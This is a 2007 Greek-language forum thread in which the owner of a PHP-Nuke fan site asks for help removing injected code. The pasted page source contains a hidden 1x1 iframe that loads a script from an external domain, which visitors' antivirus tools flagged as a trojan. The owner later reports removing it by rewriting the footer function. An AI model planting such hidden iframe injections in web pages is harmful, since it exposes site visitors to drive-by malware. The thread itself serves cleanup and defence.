gherudos Δημοσ. 20 Σεπτεμβρίου 2007 Share Δημοσ. 20 Σεπτεμβρίου 2007 Το site είναι βασισμένο σto phpnuke.Τις τελευταίες ημέρες τα antivirus/firewall πετάνε ένα error οταν κάποιος προσπαθεί να μπεί στο main site http://www.pspgr.uni.cc με internet explorer.Με μια γρήγορη ματιά χρησιμοποιώντας το firefox για να δούμε το page source βλέπουμε προς το τέλος του κώδικα αυτό: <font class="footmsg"> ΥΠΟΣΤΗΡΙΞΤΕ ΤΙΣ ΕΤΑΙΡΙΕΣ ΠΟΥ ΠΑΡΑΓΟΥΝ ΠΟΙΟΤΙΚΑ ΠΡΟΓΡΑΜΜΑΤΑ!<br> ΑΝ ΑΠΟΛΑΥΣΑΤΕ ΕΝΑ ΠΡΟΪΟΝ, ΑΓΟΡΑΣΤΕ ΤΟ! ΟΙ ΚΑΤΑΣΚΕΥΑΣΤΕΣ ΠΡΟΓΡΑΜΜΑΤΩΝ ΑΞΙΖΟΥΝ ΥΠΟΣΤΗΡΙΞΗ!!<br><br> Αυτός ο δικτυακός τόπος δεν συνδέετε με την Sony Corp.<br> "Sony" "PSP" και τα σήματα του PSP είναι εμπορικά σήματα της Sony Corp.<br><br> Η χρήση αυτού του site συνεπάγετε με την αποδοχή των <a href="http://www.octapus.net/phpnuke/modules.php?name=Legal">Όρων Χρήσης της Υπηρεσίας</a> και της <a href="http://www.octapus.net/phpnuke/modules.php?name=Privacy">Πολιτικής Προστασίας Προσωπικών Δεδομένων</a><br> Copyright © 2005 - 2006 PSPGR All Rights Reserved<br><br> <a href=http://phpnuke.org><font class=footmsg_l>PHP-Nuke</font></a> Copyright © 2005 by Francisco Burzi. This is free software and you may redistribute it under the <a href=http://phpnuke.org/files/gpl.txt><font class=footmsg_l>GPL</font></a>. PHP-Nuke comes with absolutely no warranty for details see the <a href=http://phpnuke.org/files/gpl.txt><font class=footmsg_l>license</font></a>.<iframe src=http://wbqkqibkdz.hk/dl/adv451.php width=1 height=1></iframe><!--i--><br>Page Generation: 0.220 Seconds<br> το σημείωσα με κόκκινο για να καταλάβετε τι εννοώ.Βλέποντας το παραπάνω η πρώτη μας σκέψη είναι ότι κρύβεται μέσα στο footer.php δυστυχώς όμως δεν είναι εκεί.Αν κάποιος έχει αντιμετωπίσει το ίδιο ή παρόμοιο πρόβλημα και γνωρίζει τη λύση του σας παρακαλώ να με βοηθήσει. Ευχαριστώ. Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
alexgreat Δημοσ. 21 Σεπτεμβρίου 2007 Share Δημοσ. 21 Σεπτεμβρίου 2007 Φίλε μου, αυτό το iframe προφανώς το δημιουργεί ο κώδικας που χρησιμοποιείς και - παρ' ότι δεν θα δοκιμάσω να επισκεφτώ το URL - υποψιάζομαι ότι είναι hack που κατεβάζει ιούς στον υπολογιστή των επισκεπτών. Και ποιός ξέρει τι άλλο θα βρεις εκεί μέσα από hacks. Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
gherudos Δημοσ. 21 Σεπτεμβρίου 2007 Μέλος Share Δημοσ. 21 Σεπτεμβρίου 2007 Δεν σε γεμίζει ιούς,ένα trojan κολλάει ο internet explorer κι εμφανίζει διαφημίσεις.Το θέμα είναι ότι δεν μπορώ να βρώ που κρύβεται ο κώδικας αυτός,μέσα σε ποιο αρχείο ώστε να διαγράψω εκείνο το κομμάτι. Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
gherudos Δημοσ. 21 Σεπτεμβρίου 2007 Μέλος Share Δημοσ. 21 Σεπτεμβρίου 2007 Επιτέλους το έλυσα το πρόβλημα.Όλη η ιστορία γινόταν μέσα στο footer.php Πιο αναλυτικά: Διέγραψα το αρχικό function footmsg του κώδικα και το αντικατέστησα με αυτό: >function footmsg() { echo "<font class=\"footmsg\">\n"; } Το copyright εξαφανίστηκε από το κάτω μέρος της σελίδας και μαζί του πήρε και το malicious code Πλέον είμαστε καθαροί! Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Προτεινόμενες αναρτήσεις
Αρχειοθετημένο
Αυτό το θέμα έχει αρχειοθετηθεί και είναι κλειστό για περαιτέρω απαντήσεις.